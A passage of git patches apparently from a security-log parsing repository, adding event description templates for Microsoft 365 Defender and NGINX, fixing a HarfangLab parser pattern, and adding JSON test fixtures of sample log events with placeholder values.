\",\"ClientInfoString\":\"Client=Client;Client=ClientSystem;;\",\"ClientRequestId\":\"22222222-2222-2222-2222-865deac528e4\",\"CreationTime\":\"2024-10-01T08:18:26Z\",\"ExternalAccess\":false,\"Id\":\"22222222-2222-2222-2222-08dce1f19ff1\",\"InternalLogonType\":0,\"Item\":{\"Id\":\"RgAAAACAAAAAAAAAAAAAAAAAAncHuoKBwCQDhyvSYsvTYNL\",\"ImmutableId\":\"LgAAAAAAAAAAAAAAAAAAAAAAADQCQDhyvSYsvTYNLegb6cgrxAAAo4zpzAAAJ\",\"InternetMessageId\":\"<test.JDOE.outlook.com>\",\"ParentFolder\":{\"Id\":\"AAAAAAAAAAAAAAAAAAAAAAAAAAQCQDhyvSYsvTYNLegb6cgrxAAAAAAEPAAAB\",\"Path\":\"\\\\\\\\Drafts\"},\"SizeInBytes\":4199,\"Subject\":\"subject test\"},\"LogonType\":0,\"LogonUserSid\":\"S-1-1-11-33333333333-222222222-66666666666-9341774\",\"MailboxGuid\":\"22222222-2222-2222-2222-b228527c6288\",\"MailboxOwnerMasterAccountSid\":\"S-1-1-11\",\"MailboxOwnerSid\":\"S-1-1-11-33333333333-222222222-66666666666-9341774\",\"MailboxOwnerUPN\":\"noreply@test.co\",\"Operation\":\"Send\",\"OrganizationId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"OrganizationName\":\"test.onmicrosoft.com\",\"OriginatingServer\":\"SN7PR11MB0000(5.6.7700.000)\\\\r\\\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"SaveToSentItems\":true,\"UserId\":\"noreply@test.co\",\"UserKey\":\"22222222-2222-2222-2222-8e9a218ac860\",\"UserType\":5,\"Version\":1,\"Workload\":\"Exchange\"},\"ReportId\":\"22222222-2222-2222-2222-a036-08dce1f19ff1\",\"Timestamp\":\"2024-10-01T08:18:26Z\",\"Application\":\"Microsoft Exchange Online\"},\"Tenant\":\"DefaultTenant\"}"
+    }
   },
   "expected": {
     "message": "{\"time\":\"2024-10-01T08:25:13.7165282Z\",\"tenantId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-01T08:22:28.4690000Z\",\"properties\":{\"ActionType\":\"Send\",\"ApplicationId\":20893,\"AccountDisplayName\":\"jDOE microsoft graph\",\"AccountObjectId\":null,\"AccountId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"DeviceType\":\"Other\",\"OSPlatform\":\"Unknown\",\"IPAddress\":\"1.2.3.4\",\"IsAnonymousProxy\":false,\"CountryCode\":\"FR\",\"City\":\"Paris\",\"ISP\":\"Microsoft 365 Common and Office Online server\",\"UserAgent\":\"Client=Client;Client=Client;;\",\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Account\",\"Role\":\"Actor\",\"Name\":\"jDOE microsoft graph\",\"Id\":\"22222222-2222-2222-2222-8e9a218ac860\",\"ApplicationId\":11166,\"ApplicationInstance\":0},{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Session ID\"},{\"Type\":\"Task\",\"Role\":\"Target object\",\"Name\":\"Send\"},{\"Type\":\"User\",\"Role\":\"Parameter\",\"Name\":\"noreply jDOE\",\"Id\":\"22222222-2222-2222-2222-e7a7d2c427c8\",\"ApplicationId\":11166,\"ApplicationInstance\":0}],\"AdditionalFields\":{\"Source Mac\":\"11:22:33:44:55:66\"},\"ActivityType\":\"Run\",\"ObjectName\":\"Send\",\"ObjectType\":\"Task\",\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Application\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":[\"Microsoft 365 Common and Office Online server\",\"Microsoft Azure\",\"Microsoft 365\"],\"IPCategory\":\"Cloud provider\",\"UserAgentTags\":null,\"RawEventData\":{\"AppId\":\"00000003-0000-0000-c000-000000000000\",\"ClientAppId\":\"22222222-2222-2222-2222-8e9a218ac860\",\"ClientIP\":\"1.2.3.4\",\"ClientIPAddress\":\"1.2.3.4 \",\"ClientInfoString\":\"Client=Client;Client=ClientSystem;;\",\"ClientRequestId\":\"22222222-2222-2222-2222-865deac528e4\",\"CreationTime\":\"2024-10-01T08:18:26Z\",\"ExternalAccess\":false,\"Id\":\"22222222-2222-2222-2222-08dce1f19ff1\",\"InternalLogonType\":0,\"Item\":{\"Id\":\"RgAAAACAAAAAAAAAAAAAAAAAAncHuoKBwCQDhyvSYsvTYNL\",\"ImmutableId\":\"LgAAAAAAAAAAAAAAAAAAAAAAADQCQDhyvSYsvTYNLegb6cgrxAAAo4zpzAAAJ\",\"InternetMessageId\":\"<test.JDOE.outlook.com>\",\"ParentFolder\":{\"Id\":\"AAAAAAAAAAAAAAAAAAAAAAAAAAQCQDhyvSYsvTYNLegb6cgrxAAAAAAEPAAAB\",\"Path\":\"\\\\\\\\Drafts\"},\"SizeInBytes\":4199,\"Subject\":\"subject test\"},\"LogonType\":0,\"LogonUserSid\":\"S-1-1-11-33333333333-222222222-66666666666-9341774\",\"MailboxGuid\":\"22222222-2222-2222-2222-b228527c6288\",\"MailboxOwnerMasterAccountSid\":\"S-1-1-11\",\"MailboxOwnerSid\":\"S-1-1-11-33333333333-222222222-66666666666-9341774\",\"MailboxOwnerUPN\":\"noreply@test.co\",\"Operation\":\"Send\",\"OrganizationId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"OrganizationName\":\"test.onmicrosoft.com\",\"OriginatingServer\":\"SN7PR11MB0000(5.6.7700.000)\\\\r\\\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"SaveToSentItems\":true,\"UserId\":\"noreply@test.co\",\"UserKey\":\"22222222-2222-2222-2222-8e9a218ac860\",\"UserType\":5,\"Version\":1,\"Workload\":\"Exchange\"},\"ReportId\":\"22222222-2222-2222-2222-a036-08dce1f19ff1\",\"Timestamp\":\"2024-10-01T08:18:26Z\",\"Application\":\"Microsoft Exchange Online\"},\"Tenant\":\"DefaultTenant\"}",

From 29231edac749e000b379d27e328b1d0d2d441fa4 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Fri, 4 Oct 2024 11:46:36 +0200
Subject: [PATCH 115/317] Add smart description

---
 .../microsoft-365-defender/_meta/smart-descriptions.json   | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json
index 2ecf8fe38..6673248c1 100644
--- a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json
+++ b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json
@@ -337,5 +337,12 @@
   {
     "value": "New incident {microsoft.defender.investigation.name}",
     "conditions": [{ "field": "microsoft.defender.investigation.name" }]
+  },
+  {
+    "value": "New incident from {source.ip} by {user.full_name}",
+    "conditions": [
+      { "field": "source.ip" },
+      { "field": "user.full_name" }
+    ]
   }
 ]

From aa85e621b90c6dbf3f42fcacf390396ba7737c8c Mon Sep 17 00:00:00 2001
From: FormindTMA <59610670+Thibault-MAL@users.noreply.github.com>
Date: Tue, 8 Oct 2024 11:15:00 +0200
Subject: [PATCH 116/317] Add Network.forward_ip in smart description

---
 NGINX/nginx/_meta/smart-descriptions.json | 29 +++++++++++++++++++++++
 1 file changed, 29 insertions(+)

diff --git a/NGINX/nginx/_meta/smart-descriptions.json b/NGINX/nginx/_meta/smart-descriptions.json
index 5b75f94da..52597ea0b 100644
--- a/NGINX/nginx/_meta/smart-descriptions.json
+++ b/NGINX/nginx/_meta/smart-descriptions.json
@@ -1,4 +1,33 @@
 [
+  {
+    "value": "{http.request.method} request from {network.forwarded_ip}: {url.original} (status: {http.response.status_code})",
+    "relationships": [
+      {
+        "source": "network.forwarded_ip",
+        "target": "url.original",
+        "type": "requested"
+      },
+      {
+        "source": "url.original",
+        "target": "destination.domain",
+        "type": "hosted on"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "http.request.method"
+      },
+      {
+        "field": "http.response.status_code"
+      },
+      {
+        "field": "network.forwarded_ip"
+      },
+      {
+        "field": "url.original"
+      }
+    ]
+  },
   {
     "value": "{http.request.method} request from {source.ip}: {url.original} (status: {http.response.status_code})",
     "relationships": [

From a9a8a222a2002dc2318c84bc3887743f046d1434 Mon Sep 17 00:00:00 2001
From: FormindTMA <59610670+Thibault-MAL@users.noreply.github.com>
Date: Tue, 8 Oct 2024 11:19:56 +0200
Subject: [PATCH 117/317] Add "proxy of"

---
 NGINX/nginx/_meta/smart-descriptions.json | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/NGINX/nginx/_meta/smart-descriptions.json b/NGINX/nginx/_meta/smart-descriptions.json
index 52597ea0b..41d24212e 100644
--- a/NGINX/nginx/_meta/smart-descriptions.json
+++ b/NGINX/nginx/_meta/smart-descriptions.json
@@ -1,6 +1,6 @@
 [
   {
-    "value": "{http.request.method} request from {network.forwarded_ip}: {url.original} (status: {http.response.status_code})",
+    "value": "{http.request.method} request from {source.ip} proxy of {network.forwarded_ip}: {url.original} (status: {http.response.status_code})",
     "relationships": [
       {
         "source": "network.forwarded_ip",
@@ -23,6 +23,9 @@
       {
         "field": "network.forwarded_ip"
       },
+      {
+        "field": "network.forwarded_ip"
+      },
       {
         "field": "url.original"
       }

From abd2db17f628fd13f84b3db28574ccbc48778d2f Mon Sep 17 00:00:00 2001
From: FormindTMA <59610670+Thibault-MAL@users.noreply.github.com>
Date: Tue, 8 Oct 2024 11:20:35 +0200
Subject: [PATCH 118/317] Correct source.ip

---
 NGINX/nginx/_meta/smart-descriptions.json | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/NGINX/nginx/_meta/smart-descriptions.json b/NGINX/nginx/_meta/smart-descriptions.json
index 41d24212e..db5682fa9 100644
--- a/NGINX/nginx/_meta/smart-descriptions.json
+++ b/NGINX/nginx/_meta/smart-descriptions.json
@@ -21,7 +21,7 @@
         "field": "http.response.status_code"
       },
       {
-        "field": "network.forwarded_ip"
+        "field": "source.ip"
       },
       {
         "field": "network.forwarded_ip"

From 31d4a9970e8d60beaa3f71dfbd9c0aa5706dabe6 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Tue, 8 Oct 2024 14:55:27 +0200
Subject: [PATCH 119/317] Fix cn field problem

---
 HarfangLab/harfanglab/ingest/parser.yml       |  2 +-
 .../harfanglab/tests/test_cn_fields_.json     | 78 +++++++++++++++++++
 2 files changed, 79 insertions(+), 1 deletion(-)
 create mode 100644 HarfangLab/harfanglab/tests/test_cn_fields_.json

diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml
index 6859ff3dc..e9a5e43fd 100644
--- a/HarfangLab/harfanglab/ingest/parser.yml
+++ b/HarfangLab/harfanglab/ingest/parser.yml
@@ -36,7 +36,7 @@ pipeline:
       properties:
         input_field: "{{json_event.message.event_data.MemberName}}"
         output_field: message
-        pattern: "(CN=%{DATA:first_name} %{DATA:last_name},%{GREEDYDATA})"
+        pattern: "(%{DATA:cn}=%{DATA:first_name} %{DATA:last_name},%{GREEDYDATA})"
 
   - name: agent_info
 
diff --git a/HarfangLab/harfanglab/tests/test_cn_fields_.json b/HarfangLab/harfanglab/tests/test_cn_fields_.json
new file mode 100644
index 000000000..e12fc6c8e
--- /dev/null
+++ b/HarfangLab/harfanglab/tests/test_cn_fields_.json
@@ -0,0 +1,78 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Microsoft 365 Defender",
+        "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f"
+      }
+    },
+    "message": "{\"process_id\":732,\"groups\":[{\"name\":\"TEST_Serveurs_Windows\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"},{\"name\":\"TEST_Serveurs_haute_disponibilit\u00e9\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T14:39:01.470648104Z\",\"event_id\":4728,\"@event_create_date\":\"2024-09-26T14:38:37.222Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-2-2-22-22227555-9999999999-9999999919-2402\",\"MemberSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"SubjectLogonId\":\"0x99913777\",\"SubjectDomainName\":\"TEST\",\"SubjectUserName\":\"testuser\",\"TargetDomainName\":\"TEST\",\"TargetUserName\":\"test_exception\",\"PrivilegeList\":\"-\",\"TargetSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"MemberName\":\"cn=JONE Doe,OU=Utilisateurs,OU=88 FRFR-Luxembourg,DC=test,DC=local\"},\"computer_name\":\"srv-test01.test.local\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":8666,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"555555555-9999-9999-9999-3e333333cccc\",\"user_data\":{},\"agent\":{\"agentid\":\"555555555-9999-9999-9999-3e333333cccc\",\"osproducttype\":\"Windows Server 2022 Standard\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.20348\",\"distroid\":null,\"hostname\":\"srv-test01\",\"dnsdomainname\":\"test.local\"},\"tenant\":\"fffffca6b999999\",\"record_number\":19999999}"
+  },
+  "expected": {
+    "message": "{\"process_id\":732,\"groups\":[{\"name\":\"TEST_Serveurs_Windows\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"},{\"name\":\"TEST_Serveurs_haute_disponibilit\u00e9\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T14:39:01.470648104Z\",\"event_id\":4728,\"@event_create_date\":\"2024-09-26T14:38:37.222Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-2-2-22-22227555-9999999999-9999999919-2402\",\"MemberSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"SubjectLogonId\":\"0x99913777\",\"SubjectDomainName\":\"TEST\",\"SubjectUserName\":\"testuser\",\"TargetDomainName\":\"TEST\",\"TargetUserName\":\"test_exception\",\"PrivilegeList\":\"-\",\"TargetSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"MemberName\":\"cn=JONE Doe,OU=Utilisateurs,OU=88 FRFR-Luxembourg,DC=test,DC=local\"},\"computer_name\":\"srv-test01.test.local\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":8666,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"555555555-9999-9999-9999-3e333333cccc\",\"user_data\":{},\"agent\":{\"agentid\":\"555555555-9999-9999-9999-3e333333cccc\",\"osproducttype\":\"Windows Server 2022 Standard\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.20348\",\"distroid\":null,\"hostname\":\"srv-test01\",\"dnsdomainname\":\"test.local\"},\"tenant\":\"fffffca6b999999\",\"record_number\":19999999}",
+    "event": {
+      "code": "4728",
+      "dataset": "eventlog",
+      "provider": "Microsoft-Windows-Security-Auditing",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-09-26T14:38:37.222000Z",
+    "action": {
+      "id": 4728,
+      "properties": {
+        "MemberName": "JONE Doe",
+        "SubjectDomainName": "TEST",
+        "SubjectLogonId": "0x99913777",
+        "SubjectUserName": "testuser",
+        "SubjectUserSid": "S-2-2-22-22227555-9999999999-9999999919-2402",
+        "TargetDomainName": "TEST",
+        "TargetSid": "S-2-2-22-222222229-9999944444-3976126919-4444",
+        "TargetUserName": "test_exception"
+      }
+    },
+    "agent": {
+      "id": "555555555-9999-9999-9999-3e333333cccc",
+      "name": "harfanglab"
+    },
+    "harfanglab": {
+      "groups": [
+        "{\"id\": \"3a9c8e69-a339-aacc-a444-000000000\", \"name\": \"TEST_Serveurs_Windows\"}",
+        "{\"id\": \"3a9c8e69-a339-aacc-a444-000000000\", \"name\": \"TEST_Serveurs_haute_disponibilit\\u00e9\"}"
+      ]
+    },
+    "host": {
+      "domain": "TEST",
+      "hostname": "srv-test01",
+      "name": "srv-test01",
+      "os": {
+        "full": "Windows Server 2022 Standard",
+        "version": "10.0.20348"
+      }
+    },
+    "log": {
+      "hostname": "srv-test01"
+    },
+    "organization": {
+      "id": "fffffca6b999999"
+    },
+    "related": {
+      "hosts": [
+        "srv-test01"
+      ],
+      "user": [
+        "testuser"
+      ]
+    },
+    "user": {
+      "domain": "TEST",
+      "name": "testuser",
+      "roles": "TEST_Serveurs_Windows,TEST_Serveurs_haute_disponibilit\u00e9",
+      "target": {
+        "domain": "TEST",
+        "name": "test_exception"
+      }
+    }
+  }
+}
\ No newline at end of file

From 5b3dcbf12d2983d2c57656ff7c8c1ea380b5ad73 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Tue, 8 Oct 2024 14:57:10 +0200
Subject: [PATCH 120/317] Fix linter

---
 HarfangLab/harfanglab/tests/test_cn_fields_.json | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/HarfangLab/harfanglab/tests/test_cn_fields_.json b/HarfangLab/harfanglab/tests/test_cn_fields_.json
index e12fc6c8e..875685517 100644
--- a/HarfangLab/harfanglab/tests/test_cn_fields_.json
+++ b/HarfangLab/harfanglab/tests/test_cn_fields_.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"process_id\":732,\"groups\":[{\"name\":\"TEST_Serveurs_Windows\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"},{\"name\":\"TEST_Serveurs_haute_disponibilit\u00e9\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T14:39:01.470648104Z\",\"event_id\":4728,\"@event_create_date\":\"2024-09-26T14:38:37.222Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-2-2-22-22227555-9999999999-9999999919-2402\",\"MemberSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"SubjectLogonId\":\"0x99913777\",\"SubjectDomainName\":\"TEST\",\"SubjectUserName\":\"testuser\",\"TargetDomainName\":\"TEST\",\"TargetUserName\":\"test_exception\",\"PrivilegeList\":\"-\",\"TargetSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"MemberName\":\"cn=JONE Doe,OU=Utilisateurs,OU=88 FRFR-Luxembourg,DC=test,DC=local\"},\"computer_name\":\"srv-test01.test.local\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":8666,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"555555555-9999-9999-9999-3e333333cccc\",\"user_data\":{},\"agent\":{\"agentid\":\"555555555-9999-9999-9999-3e333333cccc\",\"osproducttype\":\"Windows Server 2022 Standard\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.20348\",\"distroid\":null,\"hostname\":\"srv-test01\",\"dnsdomainname\":\"test.local\"},\"tenant\":\"fffffca6b999999\",\"record_number\":19999999}",
     "sekoiaio": {
       "intake": {
         "dialect": "Microsoft 365 Defender",
         "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f"
       }
-    },
-    "message": "{\"process_id\":732,\"groups\":[{\"name\":\"TEST_Serveurs_Windows\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"},{\"name\":\"TEST_Serveurs_haute_disponibilit\u00e9\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T14:39:01.470648104Z\",\"event_id\":4728,\"@event_create_date\":\"2024-09-26T14:38:37.222Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-2-2-22-22227555-9999999999-9999999919-2402\",\"MemberSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"SubjectLogonId\":\"0x99913777\",\"SubjectDomainName\":\"TEST\",\"SubjectUserName\":\"testuser\",\"TargetDomainName\":\"TEST\",\"TargetUserName\":\"test_exception\",\"PrivilegeList\":\"-\",\"TargetSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"MemberName\":\"cn=JONE Doe,OU=Utilisateurs,OU=88 FRFR-Luxembourg,DC=test,DC=local\"},\"computer_name\":\"srv-test01.test.local\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":8666,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"555555555-9999-9999-9999-3e333333cccc\",\"user_data\":{},\"agent\":{\"agentid\":\"555555555-9999-9999-9999-3e333333cccc\",\"osproducttype\":\"Windows Server 2022 Standard\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.20348\",\"distroid\":null,\"hostname\":\"srv-test01\",\"dnsdomainname\":\"test.local\"},\"tenant\":\"fffffca6b999999\",\"record_number\":19999999}"
+    }
   },
   "expected": {
     "message": "{\"process_id\":732,\"groups\":[{\"name\":\"TEST_Serveurs_Windows\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"},{\"name\":\"TEST_Serveurs_haute_disponibilit\u00e9\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T14:39:01.470648104Z\",\"event_id\":4728,\"@event_create_date\":\"2024-09-26T14:38:37.222Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-2-2-22-22227555-9999999999-9999999919-2402\",\"MemberSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"SubjectLogonId\":\"0x99913777\",\"SubjectDomainName\":\"TEST\",\"SubjectUserName\":\"testuser\",\"TargetDomainName\":\"TEST\",\"TargetUserName\":\"test_exception\",\"PrivilegeList\":\"-\",\"TargetSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"MemberName\":\"cn=JONE Doe,OU=Utilisateurs,OU=88 FRFR-Luxembourg,DC=test,DC=local\"},\"computer_name\":\"srv-test01.test.local\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":8666,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"555555555-9999-9999-9999-3e333333cccc\",\"user_data\":{},\"agent\":{\"agentid\":\"555555555-9999-9999-9999-3e333333cccc\",\"osproducttype\":\"Windows Server 2022 Standard\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.20348\",\"distroid\":null,\"hostname\":\"srv-test01\",\"dnsdomainname\":\"test.local\"},\"tenant\":\"fffffca6b999999\",\"record_number\":19999999}",

From d3f0cb340b5b742cf06446959c26bfa14fd85cc4 Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Tue, 8 Oct 2024 13:22:11 +0300
Subject: [PATCH 121/317] Add more smart descriptions

---
 .../_meta/smart-descriptions.json             |  80 ++++++++++++
 .../microsoft-365-defender/ingest/parser.yml  |  18 ++-
 .../tests/test_cloud_app3.json                | 119 ++++++++++++++++++
 .../tests/test_email_attachment_info.json     |  57 +++++++++
 .../tests/test_email_post_delivery.json       |  47 +++++++
 .../tests/test_email_url_info_2.json          |  43 +++++++
 .../tests/test_identity_info.json             |   6 +-
 .../tests/test_identity_info_2.json           |  40 ++++++
 .../tests/test_identity_logon_2.json          |  58 +++++++++
 .../tests/test_identity_logon_3.json          |  49 ++++++++
 .../tests/test_identity_query_2.json          |  55 ++++++++
 .../tests/test_url_click_events.json          |  53 ++++++++
 12 files changed, 622 insertions(+), 3 deletions(-)
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_cloud_app3.json
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_email_attachment_info.json
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_email_url_info_2.json
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_identity_info_2.json
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_identity_logon_2.json
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_identity_logon_3.json
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_identity_query_2.json
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_url_click_events.json

diff --git a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json
index 6673248c1..b0c711ee5 100644
--- a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json
+++ b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json
@@ -114,6 +114,24 @@
       }
     ]
   },
+  {
+    "value": "{process.parent.name} executed on {host.name}",
+    "conditions": [
+      {
+        "field": "host.name"
+      },
+      {
+        "field": "process.parent.name"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "host.name",
+        "target": "process.parent.name",
+        "type": "was executed on"
+      }
+    ]
+  },
   {
     "value": "{user.domain}\\{user.name} logged on {host.name}",
     "conditions": [
@@ -340,8 +358,70 @@
   },
   {
     "value": "New incident from {source.ip} by {user.full_name}",
+    "conditions": [{ "field": "source.ip" }, { "field": "user.full_name" }]
+  },
+  {
+    "value": "{url.original} is in an email",
+    "conditions": [
+      { "field": "event.dataset", "value": "email_url_info" },
+      { "field": "url.original" }
+    ]
+  },
+  {
+    "value": "{action.type} for {user.name} using {network.protocol}",
+    "conditions": [
+      { "field": "event.dataset", "value": "identity_logon_events" },
+      { "field": "action.type" },
+      { "field": "user.name" }
+    ]
+  },
+  {
+    "value": "Identity query: {action.type} from {source.ip} on {host.name}({destination.ip})",
     "conditions": [
+      { "field": "event.dataset", "value": "identity_query_events" },
+      { "field": "action.type" },
       { "field": "source.ip" },
+      { "field": "host.name" },
+      { "field": "destination.ip" }
+    ]
+  },
+  {
+    "value": "{event.action} email for {email.to.address}",
+    "conditions": [
+      { "field": "event.dataset", "value": "email_post_delivery_events" },
+      { "field": "email.to.address" }
+    ]
+  },
+  {
+    "value": "Email attachment {file.name} with hash {file.hash.sha256} from {email.from.address} to {email.to.address}",
+    "conditions": [
+      { "field": "event.dataset", "value": "email_attachment_info" },
+      { "field": "file.name" },
+      { "field": "file.hash.sha256" },
+      { "field": "email.from.address" },
+      { "field": "email.to.address" }
+    ]
+  },
+  {
+    "value": "{action.type} on {url.original}",
+    "conditions": [
+      {
+        "field": "event.dataset",
+        "value": "url_click_events"
+      },
+      {
+        "field": "action.type"
+      },
+      {
+        "field": "url.original"
+      }
+    ]
+  },
+  {
+    "value": "Identity info about {user.name}({user.full_name})",
+    "conditions": [
+      { "field": "event.dataset", "value": "identity_info" },
+      { "field": "user.name" },
       { "field": "user.full_name" }
     ]
   }
diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml
index b8bc57fab..d1793d4b2 100644
--- a/Microsoft/microsoft-365-defender/ingest/parser.yml
+++ b/Microsoft/microsoft-365-defender/ingest/parser.yml
@@ -92,12 +92,14 @@ pipeline:
     filter: '{{json_event.message.get("category") == "AdvancedHunting-IdentityDirectoryEvents"}}'
   # These were commented since they are not defined.
   # Uncomment once the stages are implemented.
-  #   - name: set_identity_info_fields
-  #     filter: '{{json_event.message.get("category") == "AdvancedHunting-IdentityInfo"}}'
+  - name: set_identity_info_fields
+    filter: '{{json_event.message.get("category") == "AdvancedHunting-IdentityInfo"}}'
   - name: set_identity_logon_events_fields
     filter: '{{json_event.message.get("category") == "AdvancedHunting-IdentityLogonEvents"}}'
   - name: set_identity_query_events_fields
     filter: '{{json_event.message.get("category") == "AdvancedHunting-IdentityQueryEvents"}}'
+  - name: set_url_click_events
+    filter: '{{json_event.message.get("category") == "AdvancedHunting-UrlClickEvents"}}'
 
 stages:
   set_common_fields:
@@ -566,3 +568,15 @@ stages:
           action.properties.QueryType: "{{json_event.message.properties.QueryType}}"
           action.properties.QueryTarget: "{{json_event.message.properties.QueryTarget}}"
           action.properties.Query: "{{json_event.message.properties.Query}}"
+  set_url_click_events:
+    actions:
+      - set:
+          event.dataset: "url_click_events"
+          event.category: ["web"]
+          event.type: ["info"]
+  set_identity_info_fields:
